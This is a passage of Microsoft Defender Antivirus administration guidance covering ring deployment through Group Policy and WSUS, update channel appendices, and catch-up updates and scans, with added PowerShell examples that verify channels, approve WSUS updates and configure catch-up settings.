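Once both rings' GPOs are in place, confirm on a device from each ring that the settings actually took effect and that the installed versions line up with what the channel promises. The PowerShell below is an added example, not from the Microsoft article: it reads the three update-channel preferences from Get-MpPreference, compares them with the pilot and production recommendations in the two tables above, and decodes the platform version using the 4.18.YYMM.R scheme this article describes. The numeric channel encoding used in the script (0 NotConfigured, 2 Beta, 3 Preview, 4 Staged, 5 Broad, 6 Delayed) and the mapping of the policy option "Critical – Time delay" to the Delayed value are assumptions to confirm against Get-Help Set-MpPreference on your platform version.

```powershell
# Added example (not from the Microsoft article): verify a device's effective
# update channels against the ring it belongs to, and decode the platform version.
# Assumption: Get-MpPreference exposes DefinitionUpdatesChannel, EngineUpdatesChannel
# and PlatformUpdatesChannel with the numeric encoding below (confirm on your build).

$ChannelNames = @{ 0 = 'NotConfigured'; 2 = 'Beta'; 3 = 'Preview'; 4 = 'Staged'; 5 = 'Broad'; 6 = 'Delayed' }

# Expected channels per ring, from the pilot and production tables in this article.
# 'Critical - Time delay' in the policy UI is assumed to correspond to Delayed.
$RingExpectations = @{
    Pilot      = @{ Definition = 'Staged'; Engine = 'Beta';    Platform = 'Beta' }
    Production = @{ Definition = 'Broad';  Engine = 'Delayed'; Platform = 'Delayed' }
}

function ConvertTo-ChannelName([object] $Value) {
    # Tolerate both the numeric encoding and a name, whichever the cmdlet returns.
    if ($null -eq $Value) { return 'NotConfigured' }
    $n = 0
    if ([int]::TryParse([string]$Value, [ref]$n) -and $ChannelNames.ContainsKey($n)) { return $ChannelNames[$n] }
    return [string]$Value
}

function ConvertFrom-PlatformVersion([string] $Version) {
    # 4.18.YYMM.R, e.g. 4.18.2302.7 = February 2023, minor revision 7 (the scheme the article describes).
    if ($Version -notmatch '^\d+\.\d+\.(\d{2})(\d{2})\.(\d+)$') { throw "Unexpected platform version format: $Version" }
    [pscustomobject]@{
        Version  = $Version
        Year     = 2000 + [int]$Matches[1]
        Month    = [int]$Matches[2]
        Revision = [int]$Matches[3]
    }
}

function Test-DefenderRing {
    param([Parameter(Mandatory)] [ValidateSet('Pilot', 'Production')] [string] $Ring)
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus
    $actual = @{
        Definition = ConvertTo-ChannelName $pref.DefinitionUpdatesChannel
        Engine     = ConvertTo-ChannelName $pref.EngineUpdatesChannel
        Platform   = ConvertTo-ChannelName $pref.PlatformUpdatesChannel
    }
    $expected = $RingExpectations[$Ring]
    $mismatch = foreach ($k in $expected.Keys) {
        if ($actual[$k] -ne $expected[$k]) { "$k channel is $($actual[$k]), expected $($expected[$k])" }
    }
    $problems = @($mismatch | Where-Object { $_ })
    $plat = ConvertFrom-PlatformVersion $status.AMProductVersion
    [pscustomobject]@{
        Computer         = $env:COMPUTERNAME
        Ring             = $Ring
        InRing           = ($problems.Count -eq 0)
        Mismatches       = $problems
        PlatformVersion  = $plat.Version
        PlatformBuilt    = '{0}-{1:D2}' -f $plat.Year, $plat.Month   # Broad is normally a month behind Beta
        EngineVersion    = $status.AMEngineVersion
        SignatureVersion = $status.AntivirusSignatureVersion
        SignatureAgeDays = $status.AntivirusSignatureAge
    }
}

# Usage, on a device in the ring you are checking:
# Test-DefenderRing -Ring Production | Format-List
```

A device that reports InRing False after a Group Policy refresh is usually in the wrong OU or has a later-linked GPO overriding the channel; a device that is in the ring but carries a PlatformBuilt value two or more months old is not receiving platform updates at all, which is a different problem from channel selection.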

If you encounter problems

If you encounter problems with your deployment, create or append to your Microsoft Defender Antivirus policy:

1. In Group Policy Management Console (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy using the following setting:

Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus > (administrator-defined) PolicySettingName. For example, right-click MDAV_Settings_Production, and then select Edit. Edit for MDAV_Settings_Production is shown in the following figure:

2. Select Define the order of sources for downloading security intelligence updates.

3. Select the radio button named Enabled.

4. Under Options:, change the entry to FileShares, select Apply, and then select OK.
This change is shown in the following figure:

5. Select Define the order of sources for downloading security intelligence updates.

6. Select the radio button named Disabled, select Apply, and then select OK. The
disabled option is shown in the following figure:

7. The change is active when Group Policy updates. There are two methods to refresh Group Policy:

From the command line, run the Group Policy update command, for example gpupdate /force. For more information, see gpupdate.
Wait for Group Policy to refresh automatically. Group Policy refreshes every 90 minutes +/- 30 minutes.

If you have multiple forests/domains, force replication or wait 10-15 minutes. Then force a Group Policy update from the Group Policy Management Console:

Right-click an organizational unit (OU) that contains the machines (for example, Desktops), and select Group Policy Update. This UI command is the equivalent of running gpupdate.exe /force on every machine in that OU. The feature to force Group Policy to refresh is shown in the following figure:

8. After the issue is resolved, set the signature update fallback order back to the original setting: InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShares.
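The same troubleshooting change can be made on a single client from an elevated PowerShell session, which is a quicker way to prove the share works before touching a production GPO. The following is an added example, not from the Microsoft article: it pins the client to FileShares, points it at the share, pulls an update with Update-MpSignature, reports whether the signature version moved, and restores the original fallback order in a finally block so the client is never left pinned. It assumes the share is \\server\updates (the article's example name) and that no GPO overrides these preferences; a policy value wins over Set-MpPreference, in which case use the GPO steps above.

```powershell
# Added example (not from the Microsoft article): force one client to update from
# the share, then put its fallback order back. Run elevated on the client.
# Assumptions: share is \\server\updates (no x64/x86 suffix; mpcmdrun appends it),
# and no GPO pins SignatureFallbackOrder, otherwise Set-MpPreference has no effect.

function Invoke-ShareSignatureUpdate {
    param(
        [Parameter(Mandatory)] [string] $SharePath,   # e.g. '\\server\updates'
        [string] $DefaultFallbackOrder = 'InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShares'
    )
    $before      = Get-MpComputerStatus
    $savedOrder  = (Get-MpPreference).SignatureFallbackOrder
    $savedShares = (Get-MpPreference).SignatureDefinitionUpdateFileSharesSources
    try {
        # Point the client at the share only, so a failure is unambiguous.
        Set-MpPreference -SignatureDefinitionUpdateFileSharesSources $SharePath
        Set-MpPreference -SignatureFallbackOrder 'FileShares'

        # Pull directly from the share. The command-line equivalent is
        # "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -SignatureUpdate -UNC \\server\updates
        Update-MpSignature -UpdateSource FileShares -ErrorAction Stop

        $after = Get-MpComputerStatus
        [pscustomobject]@{
            Share           = $SharePath
            SignatureBefore = $before.AntivirusSignatureVersion
            SignatureAfter  = $after.AntivirusSignatureVersion
            LastUpdated     = $after.AntivirusSignatureLastUpdated
            Updated         = ($after.AntivirusSignatureVersion -ne $before.AntivirusSignatureVersion) -or
                              ($after.AntivirusSignatureLastUpdated -gt $before.AntivirusSignatureLastUpdated)
        }
    }
    finally {
        # Always restore the fallback order so the client is not left pinned to the share.
        $restore = if ($savedOrder) { $savedOrder } else { $DefaultFallbackOrder }
        Set-MpPreference -SignatureFallbackOrder $restore
        if ($savedShares) { Set-MpPreference -SignatureDefinitionUpdateFileSharesSources $savedShares }
    }
}

# Usage:
# Invoke-ShareSignatureUpdate -SharePath '\\server\updates' | Format-List
```

If Updated comes back False, look at the Microsoft-Windows-Windows Defender/Operational event log on the client: event 2000 records a successful signature update and event 2001 a failed one, including the source it tried, which separates a permissions problem on the share from a stale or missing package.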

See also
Microsoft Defender Antivirus ring deployment overview



Microsoft Defender Antivirus pilot ring deployment using Group Policy and Windows Server Update Services
Article • 08/02/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server


Resources
The following resources provide information for using and managing Windows Server Update Services (WSUS).

Deploy Windows Defender definition updates using WSUS - Configuration Manager
Windows Server Update Services Help

Setting up the pilot environment

This section provides information about setting up the pilot (UAT/Test/QA) environment using Group Policy and Windows Server Update Services (WSUS), on about 10-500 Windows and/or Windows Server systems, depending on how many systems you have in total.

Note

Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.

Note

If you have a Citrix environment, include at least one Citrix VM (non-persistent and/or persistent).

1. Launch the Windows Server Update Services Configuration Wizard.

2. On the Before You Begin page, review the preliminary information and attend to
any configuration or credential matters, and then select Next.

3. On the Microsoft Update Improvement Program page, if you would like to participate in the program, select Yes, I would like to join the Microsoft Update Improvement Program. Select Next.

4. On the Choose Upstream Server page, select Synchronize from Microsoft Update
and then select Next.

5. On the Specify Proxy Server page, select Next.


6. On the Choose Languages page, select Download updates only in these languages. Select the update languages that you want to download, and then select Next.

7. On the Choose Products page, scroll down to Forefront, and select Forefront Client Security and System Center Endpoint Protection. This is shown in the following figure.

While still on the Choose Products page, scroll down to Windows and select
Microsoft Defender Antivirus.

8. Select Next. On the Choose Classifications page, select Critical Updates, Definition Updates, and Security Updates, and then select Next.

9. On the Configure Sync Schedule page, do the following:

Synchronize automatically: select (enable)
First synchronization: set the time to 5:00:00 AM
Synchronizations per day: set to 1

10. Select Next. On the Finished page, select Next.

11. On the What's next page, select Finish.

The Windows Server Update Services Configuration Wizard is complete.

1. Open the Update Services snap-in console, and navigate to the server node (YR2K19 in this example). The console is shown in the following figure.

2. When synchronization is complete, you can see how many products and
classifications have been added in the last 30 days. Check to ensure the status for
Last synchronization result indicates Succeeded. You may see a warning indicating
"Your WSUS server currently shows that no computers are registered to receive
updates". This warning is normal at this point of the deployment configuration
process.

View update details

1. In the Update Services console, in the navigation tree, go to Update Services > YR2K19 > Updates > All Updates.

2. In the Actions column, select Search. Search opens. In Text, type defender, and
press ENTER. The results field under Update Title lists updates that include the
word Defender in the title. For example Windows Defender and Microsoft Defender
Antivirus updates for Platform, Engine, and Intelligence. Example results are shown
in the next image.
See Viewing and Managing Updates.

3. In the Search dialog, under Update Title, double-click one of the listed KB items. One of two things happens:

If you don't have Microsoft Report Viewer 2012 Redistributable installed, the following error message appears:

Follow the link in the error message to install the Microsoft Report Viewer 2012 Redistributable before proceeding to the next numbered step of this procedure.

If Microsoft Report Viewer 2012 Redistributable is installed, Update Report for YR2K19 opens, presenting a report with information related to the KB you previously selected. An example report is shown in the following image.

To learn more about the different Microsoft Defender Antivirus Update channels,
see Manage the gradual rollout process for Microsoft Defender updates

To find out which Platform Update version is the Current Channel (Broad)
1. Go to the Microsoft Update Catalog. (This link automatically loads a search filtered to KB4052623.)

2. Search for a KB by name. For example, In the search box, type KB4052623, and
then select Search.

For example, on April 11, 2023, the latest production version is 4.18.2302.7, where
23 == 2023, 02 == February, and .7 is the minor revision.


To determine if updates are synchronized
1. In the Update Services console, go to Update Services > YR2K19 > Updates > All Updates.

2. In Approval, select Any Except Declined, and then select Refresh.

The All Updates view lists "Platform Updates" and "Security Intelligence Updates" (also known as signatures/definitions). For example, KB4052623 platform updates. The KB4052623 platform update is shown in the following figure:

3. Select KB4052623 version 4.18.2302.7 to see the synchronization status.

Note

For the "Security Intelligence Updates", see Appendix A. For the "Engine Updates", see Appendix B. For the "Platform Updates", see Appendix C.

Approve and deploy updates in WSUS

1. In the Update Services console, go to Update Services > YR2K19 > Computers > Options. The Options window opens.

2. Select Automatic Approvals to launch the Automatic Approvals configuration wizard.

3. On the Automatic Approvals page, on the Update Rules tab, select New Rule.

4. On the Add Rule page, in Step 1, select When an update is in a specific classification and When an update is in a specific product.

5. In Choose Products, scroll to Forefront, and then select Forefront Client Security. Scroll to Windows, and then select Microsoft Defender Antivirus, and then select OK. The workflow returns you to the Add Rule page.

6. On the Add Rule page, in Step 1: Select Properties, ensure the following are selected:

When an update is in a specific classification
When an update is in a specific product
Set a deadline for the approval

In Step 2: Edit the properties:

In When an update is in, ensure Forefront Client Security, System Center Endpoint Protection, and Microsoft Defender Antivirus are listed.
In Set a deadline for, select The same day as the approval at 5:00 AM.

In Step 3: Specify a name, type a name for your rule. For example, type Microsoft Defender Antivirus updates. These settings are shown in the following figure:

7. Select OK. The workflow returns to the Update Rules page. Select your new rule, for example, Microsoft Defender Antivirus updates.

8. In Rule Properties, verify the information is correct, and then select OK.
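Approving the synchronised Defender updates can also be scripted, which is useful when the automatic-approval rule above is not yet in place or you want to approve for the pilot computer group only. The PowerShell below is an added example, not from the Microsoft article; it uses the UpdateServices module that is installed with the WSUS role, so run it on the WSUS server. The computer group name Pilot and the 7-day arrival window are assumptions (the article does not define computer groups).

```powershell
# Added example (not from the Microsoft article): list the Defender updates WSUS
# has synchronised and approve recent, non-superseded ones for a target group.
# Assumptions: run on the WSUS server; a computer group named 'Pilot' exists.

Import-Module UpdateServices

function Get-DefenderWsusUpdate {
    param([string] $TitleFilter = 'Defender')
    # WsusUpdate wraps the underlying IUpdate in .Update; filter on the title, as the
    # console search in this article does, and keep the raw object for approval.
    Get-WsusUpdate -Classification All -Approval AnyExceptDeclined -Status Any |
        Where-Object { $_.Update.Title -like "*$TitleFilter*" } |
        ForEach-Object {
            [pscustomobject]@{
                Title          = $_.Update.Title
                KB             = ($_.Update.KnowledgebaseArticles -join ',')
                Classification = $_.Classification
                Arrived        = $_.Update.ArrivalDate
                Superseded     = $_.Update.IsSuperseded
                Approved       = $_.Approved
                UpdateId       = $_.UpdateId
                Raw            = $_
            }
        }
}

function Approve-DefenderWsusUpdate {
    param(
        [Parameter(Mandatory)] [string] $TargetGroupName,   # e.g. 'Pilot' (assumed group)
        [int]    $NewerThanDays = 7,                        # only what arrived recently
        [switch] $WhatIf
    )
    $cutoff = (Get-Date).AddDays(-$NewerThanDays)
    $candidates = @(Get-DefenderWsusUpdate | Where-Object {
        $_.Arrived -gt $cutoff -and -not $_.Superseded
    })
    foreach ($c in $candidates) {
        if (-not $WhatIf) {
            # Install approval with no explicit deadline; the automatic-approval rule
            # in the article adds a same-day 5:00 AM deadline if you prefer one.
            Approve-WsusUpdate -Update $c.Raw -Action Install -TargetGroupName $TargetGroupName
        }
        [pscustomobject]@{
            Title  = $c.Title
            KB     = $c.KB
            Group  = $TargetGroupName
            Action = if ($WhatIf) { 'WouldApprove' } else { 'Approved' }
        }
    }
}

# Usage on the WSUS server:
# Get-DefenderWsusUpdate | Format-Table Title, KB, Classification, Arrived, Approved
# Approve-DefenderWsusUpdate -TargetGroupName 'Pilot' -WhatIf
# Approve-DefenderWsusUpdate -TargetGroupName 'Pilot'
```

Run the -WhatIf form first and compare the titles with what the console search shows; approving only non-superseded updates that arrived inside the window keeps a scripted approval from pushing a backlog of old platform packages to the pilot group in one go.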

Define the order of sources for downloading security intelligence updates
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object you want to configure, and select Edit.

2. In the Group Policy Management Editor, go to Computer configuration, select Policies, then select Administrative templates.

3. Expand the tree to Windows components > Windows Defender > Signature updates. Double-click the Define the order of sources for downloading security intelligence updates setting and set the option to Enabled.

In Options, type InternalDefinitionUpdateServer, and then select OK. The configured Define the order of sources for downloading security intelligence updates page is shown in the following figure.

For more information, see Manage how and where Microsoft Defender Antivirus
receives updates.

See also
Microsoft Defender Antivirus ring deployment

Microsoft Defender Antivirus production ring deployment using Group Policy and
Windows Server Update Services



Microsoft Defender Antivirus production ring deployment using Group Policy and Windows Server Update Services
Article • 08/02/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server


Before you begin

This article assumes that you have experience with Windows Server Update Services (WSUS) and/or already have WSUS installed. If you aren't already familiar with WSUS, see the following articles for important configuration details:

Configure WSUS (applies to Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, and Windows Server 2012)
Configure Windows Server Update Services (WSUS) in Analytics Platform System (/sql/analytics-platform-system/configure-windows-server-update-services-wsus.md)

Setting up the production environment

This section provides information about setting up the production environment using Group Policy and Windows Server Update Services (WSUS).

Note

Security intelligence update (SIU) is equivalent to signature updates, which is the same as definition updates.

1. On the left pane of Server Manager, select Dashboard > Tools > Windows Server
Update Services.

Note

If the Complete WSUS Installation dialog box appears, select Run. In the Complete WSUS Installation dialog box, select Close when the installation successfully finishes.

2. The WSUS Configuration Wizard opens. On the Before you Begin page, review
the information, and then select Next.

3. Read the instructions on the Join the Microsoft Update Improvement Program
page. Keep the default selection if you want to participate in the program, or clear
the checkbox if you don't. Then select Next.
4. On the Choose Upstream Server page, select Synchronize from another Windows Server Update Services server.

In Server name, enter the server name. For example, type YR2K19.
In Port number, enter the port on which this server communicates with the upstream server. For example, type 8530.

This is shown in the following figure.

5. Select Next.

An autonomous downstream server, like a replica server, also uses another WSUS server as its master repository, but allows individual approvals for updates that differ from the approvals on the master. The autonomous server:

Allows flexibility in creating computer groups
Doesn't have to be in the same Active Directory forest as the master

6. (Optional, depending on configuration) On the Specify Proxy Server page, select the Use a proxy server when synchronizing checkbox. Then enter the proxy server name and port number (port 80 by default) in the corresponding boxes.

Important

You must complete this step if you identified that WSUS needs a proxy server to have internet access.

If you want to connect to the proxy server by using specific user credentials, select the Use user credentials to connect to the proxy server checkbox. Then enter the user name, domain, and password of the user in the corresponding boxes.
If you want to enable basic authentication for the user who is connecting to the proxy server, select the Allow basic authentication (password is sent in cleartext) checkbox. As the label says, this sends the proxy credential in the clear; leave it off unless the proxy cannot be configured otherwise.

Select Next.

7. On the Connect to Upstream Server page, select Start Connecting. When WSUS connects to the server, select Next.

8. On the Choose Languages page, you can select the languages from which WSUS
receives updates: all languages or a subset of languages. Selecting a subset of
languages saves disk space, but it's important to choose all the languages that all
the clients need on this WSUS server.

If you choose to get updates only for specific languages, select Download updates
only in these languages, and then select the languages for which you want
updates. Otherwise, leave the default selection.

Warning

If you select the option Download updates only in these languages, and the server has a downstream WSUS server connected to it, selecting this option forces the downstream server to also use only the selected languages.

After you select the language options for your deployment, select Next.

9. The Set Sync Schedule page opens. (The Choose Products and Choose Classifications pages are grayed out and can't be configured, because a downstream server takes them from its upstream server.)

Select Synchronize automatically, so the WSUS server synchronizes at set intervals.
In First synchronization, specify a time for the first synchronization. For example, select 5:00:00 PM.
In Synchronizations per day, specify the number of times you want synchronizations to occur. For example, select 1, and then select Next.

10. On the Finished page, select Next.

11. On the What's next page, select Next to finish.

Define the order of sources for downloading security intelligence updates
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object you want to configure, and select Edit.

2. In the Group Policy Management Editor, go to Computer configuration, select Policies, then select Administrative templates.

3. Expand the tree to Windows components > Windows Defender > Signature updates. Double-click the Define the order of sources for downloading security intelligence updates setting and set the option to Enabled. In Options, enter the order of sources for downloading security intelligence updates, for example InternalDefinitionUpdateServer, and then select OK. The configured Define the order of sources for downloading security intelligence updates page is shown in the following figure.

If you encounter problems

If you encounter problems with your deployment, create or append to your Microsoft Defender Antivirus policy:

1. In Group Policy Management Console (GPMC, GPMC.msc), create or append to your Microsoft Defender Antivirus policy using the following setting:

Go to Computer Configuration > Policies > Administrative Templates > Windows Components > Microsoft Defender Antivirus > (administrator-defined) PolicySettingName. For example, right-click MDAV_Settings_Production, and then select Edit. Edit for MDAV_Settings_Production is shown in the following figure:

2. Select Define the order of sources for downloading security intelligence updates.

3. Select the radio button named Enabled.

4. Under Options, change the entry to FileShares, select Apply, and then select OK.
This change is shown in the following figure:

5. Select Define the order of sources for downloading security intelligence updates.

6. Select the radio button named Disabled, select Apply, and then select OK. The
disabled option is shown in the following figure:

7. The change is active when Group Policy updates. There are two methods to refresh Group Policy:

From the command line, run the Group Policy update command, for example gpupdate /force. For more information, see gpupdate.
Wait for Group Policy to refresh automatically. Group Policy refreshes every 90 minutes +/- 30 minutes.

If you have multiple forests/domains, force replication or wait 10-15 minutes. Then force a Group Policy update from the Group Policy Management Console:

Right-click an organizational unit (OU) that contains the machines (for example, Desktops), and select Group Policy Update. This UI command is the equivalent of running gpupdate.exe /force on every machine in that OU. The feature to force Group Policy to refresh is shown in the following figure:

8. After the issue is resolved, set the signature update fallback order back to the original setting: InternalDefinitionUpdateServer|MicrosoftUpdateServer|MMPC|FileShares.

See also:

Step 3: Configure WSUS | Microsoft Learn


Step 4: Approve and Deploy WSUS Updates | Microsoft Learn
Step 5: Configure Group Policy Settings for Automatic Updates | Microsoft Learn
Microsoft Defender Antivirus pilot ring deployment using Group Policy and
Windows Server Update Services



Appendices for Microsoft Defender Antivirus ring deployment using Group Policy and Windows Server Update Services (WSUS)
Article • 01/05/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Windows Server


Appendix A - Security Intelligence Updates

Microsoft continually updates security intelligence in antimalware products to cover the latest threats and to constantly tweak detection logic. The updates enhance the ability of Microsoft Defender Antivirus and other Microsoft antimalware solutions to accurately identify threats. This security intelligence works directly with cloud-based protection to deliver fast and powerful AI-enhanced, next-generation protection.

References:
Security intelligence updates for Microsoft Defender Antivirus and other Microsoft
antimalware

Description of Forefront endpoint security definition updates

Appendix B - Engine Updates

Engine updates are the updates for the scan engine, which is used by the Security Intelligence Updates. First released on July 15, 2010.

Appendix C - Platform Updates

Platform Updates are the .exe, .dll, and .sys files for the Microsoft Defender Antivirus service.

Channel: Beta Channel - Prerelease
Version: 4.18.2304.4 ('23 April, minor rev 4)
Revision: n/a
Remarks: This channel is the one you want to test for app compatibility, reliability and performance.

Channel: Current Channel (Preview)
Version: 4.18.2303.8 ('23 Mar, minor rev 8)
Revision: n/a
Remarks: Same as for Beta Channel - Prerelease.

Channel: Current Channel (Staged)
Version: 4.18.2303.7 ('23 Mar, minor rev 7)
Revision: n/a
Remarks: Same as for Beta Channel - Prerelease.

Channel: Current Channel (Broad), see note
Version: 4.18.2302.7 ('23 Feb, minor rev 7)
Revision: '23 Mar
Remarks: This channel is the one you want to push out to 90%-100% of your production systems.

Note

Where 23 == 2023, 02 == February, and .7 is the minor revision.

See also
Microsoft Defender Antivirus pilot ring deployment using Group Policy and Windows
Server Update Services


Manage Microsoft Defender Antivirus updates and scans for endpoints that are out of date
Article • 03/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

With Microsoft Defender Antivirus, your security team can define how long an endpoint
can avoid an update or how many scans it can miss before it's required to receive the
update and run a scan. This capability is especially useful in environments where devices
aren't often connected to a corporate or external network, or for devices that aren't
used on a daily basis.

For example, an employee who uses a particular computer takes three days off of work,
and doesn't sign on their computer during that time. When the employee returns to
work and signs into their computer, Microsoft Defender Antivirus will immediately check
and download the latest protection updates, and then run a scan.

Set up catch-up protection updates for endpoints that haven't updated for a while
If Microsoft Defender Antivirus didn't download protection updates for a specified
period, you can set it up to automatically check and download the latest update the
next time someone signs in on an endpoint. This configuration is useful if you have
globally disabled automatic update downloads on startup.

You can use one of several methods to set up catch-up protection updates:

Configuration Manager
Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI)

Use Configuration Manager to configure catch-up protection updates
1. On your Microsoft Configuration Manager console, open the antimalware policy
you want to change (select Assets and Compliance in the navigation pane on the
left, then expand the tree to Overview > Endpoint Protection > Antimalware
Policies)

2. Go to the Security intelligence updates section and configure the following settings:

Set Force a security intelligence update if the client computer is offline for
more than two consecutive scheduled updates to Yes.
For the If Configuration Manager is used as a source for security
intelligence updates..., specify the hours before which the protection updates
delivered by Configuration Manager should be considered out of date. This
setting causes the next update location to be used, based on the defined
fallback source order.

3. Select OK.

4. Deploy the updated policy as usual.

Use Group Policy to enable and configure the catch-up update feature
1. On your Group Policy management computer, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and then select
Edit.

2. In the Group Policy Management Editor go to Computer configuration.

3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Signature Updates.

5. Double-click the Define the number of days after which a catch-up security
intelligence update is required setting and set the option to Enabled. Enter the
number of days after which you want Microsoft Defender Antivirus to check for
and download the latest protection update.

6. Select OK.
Use PowerShell cmdlets to configure catch-up protection updates

Use the following cmdlet, where the value is the number of days without a protection
update after which a catch-up update is forced at the next sign-in (1 is used here as an
example):

PowerShell

Set-MpPreference -SignatureUpdateCatchupInterval 1

For more information about using PowerShell with Microsoft Defender Antivirus, see the
following articles:

Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus
Defender Antivirus cmdlets

Use Windows Management Instrumentation (WMI) to configure catch-up protection updates
Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

SignatureUpdateCatchupInterval

See the following article for more information and allowed parameters:

Windows Defender WMIv2 APIs

Set the number of days before protection is reported as out of date
You can also specify the number of days after which Microsoft Defender Antivirus
protection is considered old or out of date. After the specified number of days, the client
will report itself as "out of date" and will show an error to the endpoint user. When an
endpoint is considered out of date, Microsoft Defender Antivirus might attempt to
download an update from other sources (based on the defined fallback source order).

You can use Group Policy to specify the number of days after which endpoint protection
is considered to be out of date.
Use Group Policy to specify the number of days before protection is considered out of date
1. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and then select
Edit.

2. In the Group Policy Management Editor go to Computer configuration.

3. Select Policies then Administrative templates.

4. Expand the tree to Windows components > Microsoft Defender Antivirus >
Signature Updates and configure the following settings:

a. Double-click Define the number of days before spyware definitions are
considered out of date and set the option to Enabled. Enter the number of
days after which you want Microsoft Defender Antivirus to consider spyware
Security intelligence to be out of date.

b. Select OK.

c. Double-click Define the number of days before virus definitions are
considered out of date and set the option to Enabled. Enter the number of
days after which you want Microsoft Defender Antivirus to consider virus
Security intelligence to be out of date.

d. Select OK.

Set up catch-up scans for endpoints that have not been scanned for a while
You can set the number of consecutive scheduled scans that can be missed before
Microsoft Defender Antivirus will force a scan.

The process for enabling this feature is:

1. Set up at least one scheduled scan (see the Scheduled scans article).

2. Enable the catch-up scan feature.

3. Define the number of scans that can be skipped before a catch-up scan occurs.

This feature can be enabled for both full and quick scans.

Tip

We recommend using quick scans for most situations. To learn more, see Quick
scan, full scan, and custom scan.

You can use one of several methods to set up catch-up scans:

Group Policy
PowerShell cmdlets
Windows Management Instrumentation (WMI)
Configuration Manager

Use Group Policy to enable and configure the catch-up scan feature
1. Ensure you have set up at least one scheduled scan.

2. On your Group Policy management machine, open the Group Policy Management
Console, right-click the Group Policy Object you want to configure and select Edit.

3. In the Group Policy Management Editor go to Computer configuration.

4. Select Policies then Administrative templates.

5. Expand the tree to Windows components > Microsoft Defender Antivirus > Scan
and configure the following settings:

If you have set up scheduled quick scans, double-click the Turn on catch-up
quick scan setting and set the option to Enabled.
If you have set up scheduled full scans, double-click the Turn on catch-up full
scan setting and set the option to Enabled. Select OK.
Double-click the Define the number of days after which a catch-up scan is
forced setting and set the option to Enabled.
Enter the number of scans that can be missed before a scan will be
automatically run when the user next signs in on the endpoint. The type of
scan that is run is determined by the Specify the scan type to use for a
scheduled scan (see the Schedule scans article). Select OK.

Note
The Group Policy setting title refers to the number of days. The setting, however, is
applied to the number of scans (not days) before the catch-up scan will be run.

Use PowerShell cmdlets to configure catch-up scans

Use the following cmdlets. The parameter names are inverted: $false turns the catch-up
scan on, $true turns it off.

PowerShell

Set-MpPreference -DisableCatchupFullScan $false
Set-MpPreference -DisableCatchupQuickScan $false

For more information about using PowerShell with Microsoft Defender Antivirus, see the
following articles:

Use PowerShell cmdlets to manage Microsoft Defender Antivirus
Defender Antivirus cmdlets

Use Windows Management Instrumentation (WMI) to configure catch-up scans
Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

DisableCatchupFullScan
DisableCatchupQuickScan

See the following article for more information and allowed parameters:

Windows Defender WMIv2 APIs

Use Configuration Manager to configure catch-up scans

1. On your Microsoft Configuration Manager console, open the antimalware policy
you want to change (select Assets and Compliance in the navigation pane on the
left, then expand the tree to Overview > Endpoint Protection > Antimalware
Policies).

2. Go to the Scheduled scans section and set Force a scan of the selected scan type if
client computer is offline... to Yes.
3. Select OK.

4. Deploy the updated policy as usual.
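The following PowerShell is an added example, not code from the original article or from Microsoft. It reports a device's current catch-up state, applies the catch-up settings described in this article through the same Set-MpPreference parameters, and remediates immediately if the device is already stale rather than waiting for the next sign-in. It assumes an elevated session on Windows with the Defender PowerShell module; the $CatchupUpdateDays, $MaxSignatureAgeDays, and $MaxQuickScanAgeDays thresholds are this example's own choices, not documented defaults.

```powershell
# Added example, not from the original article: audit and apply catch-up settings.
# Assumes an elevated PowerShell session on Windows with the Defender module
# (Get-MpComputerStatus, Get-MpPreference, Set-MpPreference, Update-MpSignature, Start-MpScan).
# The three thresholds below are this example's own choices, not documented defaults.

$CatchupUpdateDays   = 1   # days without a protection update before a catch-up update is forced at sign-in
$MaxSignatureAgeDays = 3   # if signatures are already older than this, don't wait for the next sign-in
$MaxQuickScanAgeDays = 7   # if the last quick scan is already older than this, scan immediately

$status = Get-MpComputerStatus
$pref   = Get-MpPreference

# Snapshot of the state this article's settings act on. Ages are reported in days.
[pscustomobject]@{
    SignatureAgeDays        = $status.AntivirusSignatureAge
    SignatureLastUpdated    = $status.AntivirusSignatureLastUpdated
    QuickScanAgeDays        = $status.QuickScanAge
    FullScanAgeDays         = $status.FullScanAge
    CatchupUpdateInterval   = $pref.SignatureUpdateCatchupInterval
    CatchupQuickScanEnabled = -not $pref.DisableCatchupQuickScan   # the Disable* switches are inverted
    CatchupFullScanEnabled  = -not $pref.DisableCatchupFullScan
    ScheduledQuickScanTime  = $pref.ScanScheduleQuickScanTime      # catch-up scans need a schedule to miss
} | Format-List

# Apply the settings described in this article. $false on a Disable* parameter turns the
# catch-up scan ON; quick scans are the recommended scan type for most situations.
Set-MpPreference -SignatureUpdateCatchupInterval $CatchupUpdateDays
Set-MpPreference -DisableCatchupQuickScan $false

# Catch-up logic only runs at the next sign-in. If the device is already stale, remediate now:
# pull signatures through the configured fallback order, then run a quick scan.
if ($status.AntivirusSignatureAge -gt $MaxSignatureAgeDays) {
    Update-MpSignature
}
if ($status.QuickScanAge -gt $MaxQuickScanAgeDays) {
    Start-MpScan -ScanType QuickScan
}

# Re-read the effective values. If they don't match what was just set, a higher-precedence
# source (Group Policy, Configuration Manager, Intune) or tamper protection owns the setting.
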